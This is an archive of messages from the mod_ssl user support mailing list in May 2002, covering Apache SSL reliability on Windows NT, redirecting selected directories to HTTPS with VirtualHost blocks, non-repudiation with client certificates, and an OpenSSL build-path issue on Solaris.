14th June 2002 is RNIB Look Loud Day - visit http://www.lookloud.org.uk to
find out all about it.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May  7 13:26:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA20173; Tue, 7 May 2002 13:25:08 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mag06.bb.admin.ch id NAA20127; Tue, 7 May 2002 13:24:04 +0200 (MET DST)
From: Michael.Straessle@bk.admin.ch
Received: from mar01.bb.admin.ch (mar01.bb.admin.ch [193.5.222.71])
	by mag06.bb.admin.ch (8.11.2/8.11.2) with ESMTP id g47BO4t28749
	for ; Tue, 7 May 2002 13:24:04 +0200 (METDST)
Received: from mas21.bb.admin.ch (mas21.bb.admin.ch [193.5.222.82])
	by mar01.bb.admin.ch (8.11.2/8.11.2) with SMTP id g47BO3J26905
	for ; Tue, 7 May 2002 13:24:03 +0200 (METDST)
Received: by ad01007exc.ad.admin.ch with Internet Mail Service (5.5.2653.19)
	id ; Tue, 7 May 2002 13:24:03 +0200
Message-ID: 
To: modssl-users@modssl.org
Subject: AW: Re: WIN32-apache 1.3.x (windows NT) problem of serving concur
	rent https requests
Date: Tue, 7 May 2002 13:24:00 +0200 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id NAA20164
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Michael.Straessle@bk.admin.ch
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> -----Ursprüngliche Nachricht-----
> Von: Johannes Bertscheit [mailto:jbertscheit@web.de]
> Gesendet: Samstag, 4. Mai 2002 19:27
> An: modssl-users@modssl.org
> Cc: jbertscheit@web.de
> Betreff: Re: Re: WIN32-apache 1.3.x (windows NT) problem of serving
> concurrent https requests
(cut)

> Are there any people out there - stating that they have a 
> apache mod_ssl 
> running on windows NT RELIABLE ???
> 
> johannes

hmm.. now this calls for an answer. 

we are running ssl-enabled apache on NT since end 99, first ibm http server
1.3.6.2 with 56bit ssl encryption, since december 01 Apache/1.3.22 (Win32)
mod_jk/1.2.0 ApacheJServ/1.1.2 mod_ssl/2.8.5 OpenSSL/0.9.6b. there were some
crashes with mod_ssl in the beginning, but none since i set KeepAlive Off in
httpd.conf. average hits per day on the webserver are 100k.
availability ist 99.97% over the past 2 months, the remaining 0.03% are
caused by hardware changes. the only unplanned reboot since start of
production on this machine in may 99 was due to someone pulling out the
power cable between server and ups.

michael


> -----Ursprüngliche Nachricht-----
> Von: Johannes Bertscheit [mailto:jbertscheit@web.de]
> Gesendet: Samstag, 4. Mai 2002 19:27
> An: modssl-users@modssl.org
> Cc: jbertscheit@web.de
> Betreff: Re: Re: WIN32-apache 1.3.x (windows NT) problem of serving
> concurrent https requests
(cut)

> Are there any people out there - stating that they have a 
> apache mod_ssl 
> running on windows NT RELIABLE ???
> 
> johannes
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May  7 13:36:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA20623; Tue, 7 May 2002 13:32:18 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from dflx.flanigan.net id NAA20552; Tue, 7 May 2002 13:31:26 +0200 (MET DST)
Received: from flanigan.net (localhost [127.0.0.1] (may be forged))
	by dflx.flanigan.net (8.11.6/8.11.6) with ESMTP id g47BTBG02720
	for ; Tue, 7 May 2002 07:29:11 -0400
From: "David Flanigan" 
To: modssl-users@modssl.org
Subject: N/A
Date: Tue, 7 May 2002 07:29:11 +0900
Message-Id: <20020507072911.M27792@flanigan.net>
X-Mailer: Open WebMail 1.64 20020415
X-OriginatingIP: 208.43.112.96 (dflan)
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="----=OPENWEBMAIL_ATT_0.22707754124804"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "David Flanigan" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=OPENWEBMAIL_ATT_0.22707754124804
Content-Type: text/plain; charset=iso-8859-1

Hello, 

 My apologies if this has been discussed before, I did not turn up much in my 
archive search. I am new to modssl and to this list. Any help you can provide 
would be greatly appreciated. 

 I have a server wide SSL certificate for my domain, but only need SSL 
support in certain areas. Is there a way to redirect non SSL requests (port 
80) for particular directories to SSL without requiring the user to to do 
anything? So automatically:

 http://www.foo.com/private/

 becomes

 https://www.foo.com/private

 I am currently using the SSLRequireSSL directive to lock out non-SSL 
connections to those directories, resulting in a error to the user. 

 I have tried a location specific redirect like the following, but ended up 
with a loop (and a couple thousand extra entries in my log file). 
 
    
    Redirect seeother /private https://www.foo.com/private
    

 Am I on the right track or making this to difficult? I have no mod-rewrite 
skills, so have not tried that route as of yet. 

 Thanks in advance. 
--
Kind Regards, 
David A. Flanigan (dave@flanigan.net)


------=OPENWEBMAIL_ATT_0.22707754124804
Content-Type: application/octet-stream;
	name="Forse SSL for some directories"
Content-Transfer-Encoding: base64


------=OPENWEBMAIL_ATT_0.22707754124804--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May  7 13:57:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA21896; Tue, 7 May 2002 13:56:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from it0033.it-action.com id NAA21854; Tue, 7 May 2002 13:55:16 +0200 (MET DST)
Received: from itaction.co.uk ([212.36.137.30]) by
          it0033.it-action.com (Netscape Messaging Server 4.15) with ESMTP
          id GVQP3Q00.32M for ; Tue, 7 May 2002
          12:55:02 +0100 
Message-ID: <3CD7C098.1090801@itaction.co.uk>
Date: Tue, 07 May 2002 12:55:04 +0100
From: "Peter Viertel" 
Organization: IT Action Ltd
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.0.0+) Gecko/20020429
X-Accept-Language: en-gb, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: N/A
References: <20020507072911.M27792@flanigan.net>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Peter Viertel" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Use VirtualHost stanzas:

ie:


        ServerName www.foo.com
        Redirect    /private      https://www.foo.com/private
        DocumentRoot "htdocs"




        ServerName www.foo.com
        SSLCertificateFile conf/ssl.crt/server.crt
        SSLCertificateKeyFile conf/ssl.key/server.key
        SSLEngine on
        DocumentRoot "secure"





David Flanigan wrote:

>Hello,
>
> My apologies if this has been discussed before, I did not turn up much in my
>archive search. I am new to modssl and to this list. Any help you can provide
>would be greatly appreciated.
>
> I have a server wide SSL certificate for my domain, but only need SSL
>support in certain areas. Is there a way to redirect non SSL requests (port
>80) for particular directories to SSL without requiring the user to to do
>anything? So automatically:
>
> http://www.foo.com/private/
>
> becomes
>
> https://www.foo.com/private
>
> I am currently using the SSLRequireSSL directive to lock out non-SSL
>connections to those directories, resulting in a error to the user.
>
> I have tried a location specific redirect like the following, but ended up
>with a loop (and a couple thousand extra entries in my log file).
>
>    
>    Redirect seeother /private https://www.foo.com/private
>    
>
> Am I on the right track or making this to difficult? I have no mod-rewrite
>skills, so have not tried that route as of yet.
>
> Thanks in advance.
>--
>Kind Regards,
>David A. Flanigan (dave@flanigan.net)
>
>
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May  7 16:09:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA00249; Tue, 7 May 2002 16:08:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.thenewpush.com id QAA00210; Tue, 7 May 2002 16:07:21 +0200 (MET DST)
Received: (qmail 30655 invoked from network); 7 May 2002 14:13:08 -0000
Received: from unknown (HELO thenewpush.com) (bnagy@thenewpush.com@64.32.183.122)
  by sophocles with RC4-MD5 encrypted SMTP; 7 May 2002 14:13:08 -0000
Message-ID: <3CD7DD7D.8010207@thenewpush.com>
Date: Tue, 07 May 2002 07:58:21 -0600
From: =?ISO-8859-1?Q?Bal=E1zs_Nagy?= 
Organization: theNewPush, LLC.
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0rc1) Gecko/20020417
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Repudiability
References: <9B66BBD37D5DD411B8CE00508B69700F02067004@pborolocal.rnib.org.uk>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?ISO-8859-1?Q?Bal=E1zs_Nagy?= 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

John.Airey@rnib.org.uk wrote:

>>Suppose someone refutes that they have sent information to a Web site
>>owner, how is the Web site owner to prove that the information was in
>>fact received and that it was signed with a given key?
>>
>>To do this, the Web site owner would presumably need to be 
>>able to produce
>>the still-encrypted post as sent by the user, but from a 
>>quickish reading
>>of the mod_ssl reference, I don't see any way to log this information.
>>
>>Andrew McNaughton
> 
> Provided you know the time of the transaction, the web server logs will give
> you details of the IP address all the web transactions are coming from. You
> can find who owns this IP address via the Ripe (www.ripe.net), Arin
> (www.arin.net) or Apnic (www.apnic.net) websites.
> 
> From this you can find which ISP this address belongs to, and that ISP can
> verify who was using that IP address at the time. How much assistance you
> receive from each ISP will vary.
> 
> That may give you sufficient information to press a case against the person
> who alleges they didn't access your website, but IANAL. 

John, unfortunately IP hijacking is so trivial (see threads on bugtrack) that
this method will not work with reasonable certainty.

> I'm not sure what you mean about information being signed with a given key.
> Do you mean a personal key like a digital signature, or do you mean the SSL
> key?

The Andrew is right.  Repudiation or rather non-repudiation
can be achieved with public-private<->private public encryption.
Owen is right SSL/HTTPS doesn't support that in itself. Here is how
public-private auth/encoding should work:

Message = M
Transmitted = T
Public Key = pub
Private Key = priv
Transmision of Message M: M->T--transmit-->T->M
pub-priv enc works like T = enc(pub, M) <=> M = dec(priv, T)
                         T = enc(priv, M) <=> M = dec(pub, T)

Non repudiation: send T = enc(priv_sender, enc(pub_receiver, M))
                  receive M = dec(pub_sender, dec(priv_receiver, T))

Of course this is simplifed, but holds the principle.

With HTTPS, the only way to authenticate for sure the message
sender, is with the sender's cert (CLIENT CERT). If you log that
auth, then you know for sure who came to the site. For that, you
need to restrict that part of the site to auth with client certs.

The astute reader noticed that all this digital signature shebang
works only if solely the owner uses his cert.

Hope this helps.

Cheers,
	Balázs

-----------------------------------------------------
Balázs Nagy                           TheNewPush, LLC
Managing Partner                 tel. +1-303-523-5729
Research & Development           fax. +1-720-294-0933
=======>Internet Infrastructure and Presence Provider

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May  7 16:20:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA00926; Tue, 7 May 2002 16:19:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from maggotts.rnib.org.uk id QAA00871; Tue, 7 May 2002 16:18:36 +0200 (MET DST)
From: John.Airey@rnib.org.uk
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g47EIEv08644
	for ; Tue, 7 May 2002 14:18:19 GMT
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Tue, 7 May 2002 15:18:11 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F0206700D@pborolocal.rnib.org.uk>
To: modssl-users@modssl.org
Subject: RE: Repudiability
Date: Tue, 7 May 2002 15:18:10 +0100 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id QAA00910
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> -----Original Message-----
> From: Balázs Nagy [mailto:bn@thenewpush.com]
> Sent: 07 May 2002 14:58
> To: modssl-users@modssl.org
> Subject: Re: Repudiability
> 
> 
> John.Airey@rnib.org.uk wrote:
> 
> >>Suppose someone refutes that they have sent information to 
> a Web site
> >>owner, how is the Web site owner to prove that the 
> information was in
> >>fact received and that it was signed with a given key?
> >>
> >>To do this, the Web site owner would presumably need to be 
> >>able to produce
> >>the still-encrypted post as sent by the user, but from a 
> >>quickish reading
> >>of the mod_ssl reference, I don't see any way to log this 
> information.
> >>
> >>Andrew McNaughton
> > 
> > Provided you know the time of the transaction, the web 
> server logs will give
> > you details of the IP address all the web transactions are 
> coming from. You
> > can find who owns this IP address via the Ripe (www.ripe.net), Arin
> > (www.arin.net) or Apnic (www.apnic.net) websites.
> > 
> > From this you can find which ISP this address belongs to, 
> and that ISP can
> > verify who was using that IP address at the time. How much 
> assistance you
> > receive from each ISP will vary.
> > 
> > That may give you sufficient information to press a case 
> against the person
> > who alleges they didn't access your website, but IANAL. 
> 
> John, unfortunately IP hijacking is so trivial (see threads 
> on bugtrack) that
> this method will not work with reasonable certainty.
> 
I don't think the question involved IP address hijacking, but I take your
point. I also forgot to factor in AOL users who apparently (urban myth?)
change IP addresses every few seconds. I haven't seen anything on Bugtraq
recently about IP hijacking, but then again I delete more emails from
Bugtraq than I do from this list.

- 
John Airey
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

The teaching of evolution as a proven fact rather than a theory has done
more harm to scientific progress than anything else in history.

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 

14th June 2002 is RNIB Look Loud Day - visit http://www.lookloud.org.uk to
find out all about it.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May  7 16:57:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA02982; Tue, 7 May 2002 16:56:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from dflx.flanigan.net id QAA02948; Tue, 7 May 2002 16:55:33 +0200 (MET DST)
Received: from flanigan.net (localhost [127.0.0.1] (may be forged))
	by dflx.flanigan.net (8.11.6/8.11.6) with ESMTP id g47ErJG32503
	for ; Tue, 7 May 2002 10:53:19 -0400
From: "David Flanigan" 
To: modssl-users@modssl.org
Subject: Re: N/A
Date: Tue, 7 May 2002 10:53:19 +0900
Message-Id: <20020507105319.M61475@flanigan.net>
In-Reply-To: <3CD7C098.1090801@itaction.co.uk>
References: <20020507072911.M27792@flanigan.net> <3CD7C098.1090801@itaction.co.uk>
X-Mailer: Open WebMail 1.64 20020415
X-OriginatingIP: 208.43.112.96 (dflan)
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "David Flanigan" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Peter:

 This server is not running with virtual hosts (only a single domain), the 
doc root for SSL and non-SSL is the same. Anyway I can do the automatic 
redirect without moving the doc roots around?

 Thanks for your help. 

--
Kind Regards, 
David A. Flanigan



---------- Original Message -----------
From: "Peter Viertel" 
To: modssl-users@modssl.org
Sent: Tue, 07 May 2002 12:55:04 +0100
Subject: Re: N/A

> Use VirtualHost stanzas:
> 
> ie:
> 
> 
>         ServerName www.foo.com
>         Redirect    /private      https://www.foo.com/private
>         DocumentRoot "htdocs"
> 
> 
> 
> 
>         ServerName www.foo.com
>         SSLCertificateFile conf/ssl.crt/server.crt
>         SSLCertificateKeyFile conf/ssl.key/server.key
>         SSLEngine on
>         DocumentRoot "secure"
> 
> 
> 
> David Flanigan wrote:
> 
> >Hello,
> >
> > My apologies if this has been discussed before, I did not turn up much in 
my
> >archive search. I am new to modssl and to this list. Any help you can 
provide
> >would be greatly appreciated.
> >
> > I have a server wide SSL certificate for my domain, but only need SSL
> >support in certain areas. Is there a way to redirect non SSL requests (port
> >80) for particular directories to SSL without requiring the user to to do
> >anything? So automatically:
> >
> > http://www.foo.com/private/
> >
> > becomes
> >
> > https://www.foo.com/private
> >
> > I am currently using the SSLRequireSSL directive to lock out non-SSL
> >connections to those directories, resulting in a error to the user.
> >
> > I have tried a location specific redirect like the following, but ended up
> >with a loop (and a couple thousand extra entries in my log file).
> >
> >    
> >    Redirect seeother /private https://www.foo.com/private
> >    
> >
> > Am I on the right track or making this to difficult? I have no mod-rewrite
> >skills, so have not tried that route as of yet.
> >
> > Thanks in advance.
> >--
> >Kind Regards,
> >David A. Flanigan (dave@flanigan.net)
> >
> >
> >
> 
> ______________________________________________________________________ 
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org User 
Support Mailing List                      modssl-users@modssl.org Automated 
List Manager                            majordomo@modssl.org
------- End of Original Message -------

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May  7 18:06:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA08178; Tue, 7 May 2002 18:05:28 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from it0033.it-action.com id SAA08133; Tue, 7 May 2002 18:04:27 +0200 (MET DST)
Received: from itaction.co.uk ([212.36.137.30]) by
          it0033.it-action.com (Netscape Messaging Server 4.15) with ESMTP
          id GVR0N900.G2L for ; Tue, 7 May 2002
          17:04:21 +0100 
Message-ID: <3CD7FB08.7030405@itaction.co.uk>
Date: Tue, 07 May 2002 17:04:24 +0100
From: "Peter Viertel" 
Organization: IT Action Ltd
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.0.0+) Gecko/20020429
X-Accept-Language: en-gb, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: N/A
References: <20020507072911.M27792@flanigan.net> <3CD7C098.1090801@itaction.co.uk> <20020507105319.M61475@flanigan.net>
Content-Type: multipart/alternative;
 boundary="------------060704010505050901090609"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Peter Viertel" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


--------------060704010505050901090609
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

You shouldnt be afraid of virtual hosts.....

If you split them up as vhosts, then you can do what you want. If you
don't, you can't.
In my example i used seperate DocRoot's, but this is not necessary.

P.S. can you fix your PC's clock?  your timezone is 13 hours out.

David Flanigan wrote:

>Peter:
>
> This server is not running with virtual hosts (only a single domain), the
>doc root for SSL and non-SSL is the same. Anyway I can do the automatic
>redirect without moving the doc roots around?
>
> Thanks for your help.
>
>--
>Kind Regards,
>David A. Flanigan
>
>
>
>---------- Original Message -----------
>From: "Peter Viertel" 
>To: modssl-users@modssl.org
>Sent: Tue, 07 May 2002 12:55:04 +0100
>Subject: Re: N/A
>
>
>
>>Use VirtualHost stanzas:
>>
>>ie:
>>
>>
>>        ServerName www.foo.com
>>        Redirect    /private      https://www.foo.com/private
>>        DocumentRoot "htdocs"
>>
>>
>>
>>
>>        ServerName www.foo.com
>>        SSLCertificateFile conf/ssl.crt/server.crt
>>        SSLCertificateKeyFile conf/ssl.key/server.key
>>        SSLEngine on
>>        DocumentRoot "secure"
>>
>>
>>
>>David Flanigan wrote:
>>
>>
>>
>>>Hello,
>>>
>>>My apologies if this has been discussed before, I did not turn up much in
>>>
>>>
>my
>
>
>>>archive search. I am new to modssl and to this list. Any help you can
>>>
>>>
>provide
>
>
>>>would be greatly appreciated.
>>>
>>>I have a server wide SSL certificate for my domain, but only need SSL
>>>support in certain areas. Is there a way to redirect non SSL requests (port
>>>80) for particular directories to SSL without requiring the user to to do
>>>anything? So automatically:
>>>
>>>http://www.foo.com/private/
>>>
>>>becomes
>>>
>>>https://www.foo.com/private
>>>
>>>I am currently using the SSLRequireSSL directive to lock out non-SSL
>>>connections to those directories, resulting in a error to the user.
>>>
>>>I have tried a location specific redirect like the following, but ended up
>>>with a loop (and a couple thousand extra entries in my log file).
>>>
>>>   
>>>   Redirect seeother /private https://www.foo.com/private
>>>   
>>>
>>>Am I on the right track or making this to difficult? I have no mod-rewrite
>>>skills, so have not tried that route as of yet.
>>>
>>>Thanks in advance.
>>>--
>>>Kind Regards,
>>>David A. Flanigan (dave@flanigan.net)
>>>
>>>
>>>
>>>
>>>
>>______________________________________________________________________
>>
>>
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org User
>Support Mailing List                      modssl-users@modssl.org Automated
>List Manager                            majordomo@modssl.org
>------- End of Original Message -------
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
>


--------------060704010505050901090609
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit




  
  


You shouldnt be afraid of virtual hosts.....



If you split them up as vhosts, then you can do what you want. If you don't,
you can't.

In my example i used seperate DocRoot's, but this is not necessary.



P.S. can you fix your PC's clock?  your timezone is 13 hours out.



David Flanigan wrote:



  
Peter:

 This server is not running with virtual hosts (only a single domain), the
doc root for SSL and non-SSL is the same. Anyway I can do the automatic
redirect without moving the doc roots around?

 Thanks for your help.

--
Kind Regards,
David A. Flanigan



---------- Original Message -----------
From: "Peter Viertel" <peter.viertel@itaction.co.uk>
To: modssl-users@modssl.org
Sent: Tue, 07 May 2002 12:55:04 +0100
Subject: Re: N/A

  

  

    
Use VirtualHost stanzas:

ie:

<VirtualHost _default_:80>
        ServerName www.foo.com
        Redirect    /private      https://www.foo.com/private
        DocumentRoot "htdocs"
</VirtualHost>

<ifdefine SSL>
<VirtualHost _default_:443>
        ServerName www.foo.com
        SSLCertificateFile conf/ssl.crt/server.crt
        SSLCertificateKeyFile conf/ssl.key/server.key
        SSLEngine on
        DocumentRoot "secure"
</VirtualHost>
</ifdefine>

David Flanigan wrote:

    

    

      
Hello,

My apologies if this has been discussed before, I did not turn up much in
      

    

  

  
my
  

  

    

      
archive search. I am new to modssl and to this list. Any help you can
      

    

  

  
provide
  

  

    

      
would be greatly appreciated.

I have a server wide SSL certificate for my domain, but only need SSL
support in certain areas. Is there a way to redirect non SSL requests (port
80) for particular directories to SSL without requiring the user to to do
anything? So automatically:

http://www.foo.com/private/

becomes

https://www.foo.com/private

I am currently using the SSLRequireSSL directive to lock out non-SSL
connections to those directories, resulting in a error to the user.

I have tried a location specific redirect like the following, but ended up
with a loop (and a couple thousand extra entries in my log file).

   <Location /private>
   Redirect seeother /private https://www.foo.com/private
   </Location>

Am I on the right track or making this to difficult? I have no mod-rewrite
skills, so have not tried that route as of yet.

Thanks in advance.
--
Kind Regards,
David A. Flanigan (dave@flanigan.net)



      

    

    
______________________________________________________________________
    

  

  
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org User
Support Mailing List                      modssl-users@modssl.org Automated
List Manager                            majordomo@modssl.org
------- End of Original Message -------

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
  








--------------060704010505050901090609--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May  7 19:40:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA15345; Tue, 7 May 2002 19:39:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id TAA15300; Tue, 7 May 2002 19:38:45 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 499954CE762; Tue,  7 May 2002 19:38:44 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g47HanL50697; Tue, 7 May 2002 19:36:49 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id EAA16390; Tue, 7 May 2002 04:45:28 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g472jQ000428
	for ; Mon, 6 May 2002 22:45:26 -0400
Date: Mon, 6 May 2002 22:45:26 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: (OpenSSL library error follows) - in Apache 2.0.35 with mod_ssl
In-Reply-To: <20020506223606.A82656@sidehack.sat.gweep.net>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Mon, 6 May 2002, MegaZone wrote:

> (Wisdom I relearned today - use explicit paths.  You never know when
> someone else has left an old install laying around earlier in your
> build path.  Like, say, a non-shared openssl which makes a shared
> apache+mod_ssl sad...  Not that I wasted a lot of time on that...)

Bummer, yeah, that's a kind of nasty one.  We're trying to figure out a
clean way to get around that problem, but haven't gotten anything in yet.

Glad you got it.

--Cliff

--------------------------------------------------------------
   Cliff Woolley
   cliffwoolley@yahoo.com
   Charlottesville, VA

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May  7 19:40:21 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA15341; Tue, 7 May 2002 19:39:07 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id TAA15298; Tue, 7 May 2002 19:38:45 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 3AECD4CE75C; Tue,  7 May 2002 19:38:44 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g47HaV550681; Tue, 7 May 2002 19:36:31 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from sidehack.sat.gweep.net id BAA04701; Tue, 7 May 2002 01:22:35 +0200 (MET DST)
Received: (qmail 70267 invoked by uid 908); 6 May 2002 23:22:33 -0000
Date: Mon, 6 May 2002 19:22:33 -0400
From: MegaZone 
To: modssl-users@modssl.org
Subject: OpenSSL with mod_ssl in Apache 2.0.35
Message-ID: <20020506192233.A70215@sidehack.sat.gweep.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5.1i
Organization: WPI Discordian Society, Undocumented Cabal of the Accursed Saint Shiranto Joe
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: MegaZone 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,

The platform is Solaris 8.

I've installed OpenSSL 0.9.6c, and then Apache 2.0.35 using 
./configure --prefix=/local/webhome/apache-2.0.35 --enable-mods-shared="ssl"

I can start Apache without SSL, but when I try to use SSL I receive
this message:

[malarkey:/local/webhome/apache/conf]458 % /local/webhome/apache/bin/apachectl startssl
